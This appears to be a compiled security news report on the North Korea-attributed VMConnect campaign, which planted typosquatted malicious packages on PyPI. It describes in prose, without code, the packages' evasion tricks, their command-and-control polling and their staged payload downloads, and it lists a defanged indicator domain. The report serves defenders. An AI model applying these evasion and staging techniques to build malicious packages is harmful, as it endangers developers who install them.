North Korean state-sponsored hackers [1] [2] [3] [4] [5] [6], known as Labyrinth Chollima [5] [6], have been identified as the perpetrators behind the VMConnect campaign [5]. This campaign involved uploading malicious packages to the Python Package Index (PyPI) repository [3], targeting IT professionals seeking virtualization tools [5].
Description
The VMConnect campaign utilized the PyPI repository to distribute malicious packages, with one package mimicking the VMware vSphere connector module vConnector [5]. These packages were eventually removed from PyPI after being downloaded 237 times [5]. ReversingLabs [5], a software supply chain security company [5], discovered additional packages associated with the VMConnect operation [5], including ‘tablediter’ (736 downloads), ‘request-plus’ (43 downloads) [5], and ‘requestspro’ (341 downloads) [5]. These packages impersonated popular software projects and had minimal differences in file structure and content compared to the originals.
The tablediter package contained code that mimicked the popular prettytable tool [3]. When executed [3], it contacted a command-and-control server and attempted to download additional commands [3]. To avoid detection, the package used XOR encryption and hex encoding instead of Base64 encoding [3]. It also ran an endless execution loop, periodically polling a remote server to retrieve and execute a Base64-encoded payload [1] [2] [4]. The exact nature of this payload is still unknown. The tablediter package evaded detection by security software by waiting until it was imported and its functions were called [1] [2] [4].
Similarly, the request-plus and requestspro packages targeted the requests HTTP library [3]. These packages impersonated the legitimate requests package and communicated with a command-and-control server [3]. They collected information about the infected machine and transmitted it to the server [1] [2] [4]. In response, the server provided a token, which the infected host sent back to a different URL on the same server [1] [2] [4] [6]. This URL was used to receive a double-encoded Python module and a download URL [1] [2] [4] [6]. It is suspected that the decoded module downloaded the next stage of the malware [1] [2] [4].
The VMConnect package was linked to the pyQRcode package [6], which had similar malicious functionality [6]. Attacks on macOS systems involved the deployment of JokerSpy [6], a backdoor discovered in June 2023 [6]. Another piece of malware [6], QRLog [6], shared functionality with pyQRcode and referenced the domain www.git-hub[. [6]]me, which was also associated with JokerSpy infections. QRLog is believed to be the work of the Labyrinth Chollima sub-cluster within the Lazarus Group [6].
Conclusion
The VMConnect campaign highlights the sophisticated tactics employed by state-sponsored hackers to target IT professionals seeking virtualization tools. The use of impersonation and evasion techniques, such as mimicking popular software projects and waiting for importation, demonstrates the need for robust security measures. The discovery of additional packages associated with the VMConnect operation raises concerns about the extent of the campaign’s reach and potential future implications. It is crucial for organizations and individuals to remain vigilant and implement effective security measures to mitigate the risks posed by such attacks.
References
[1] https://patabook.com/technology/2023/08/31/north-korean-hackers-deploy-new-malicious-python-packages-in-pypi-repository/
[2] https://www.redpacketsecurity.com/north-korean-hackers-deploy-new-malicious-python-packages-in-pypi-repository/
[3] https://securityboulevard.com/2023/08/vmconnect-supply-chain-attack-continues-evidence-points-to-north-korea/
[4] https://thehackernews.com/2023/08/north-korean-hackers-deploy-new.html
[5] https://hightechnews.org/north-korean-hackers-behind-malicious-vmconnect-pypi-marketing-campaign/
[6] https://vulners.com/thn/THN:5B82D5B2657D110191B328DC3B213B8B
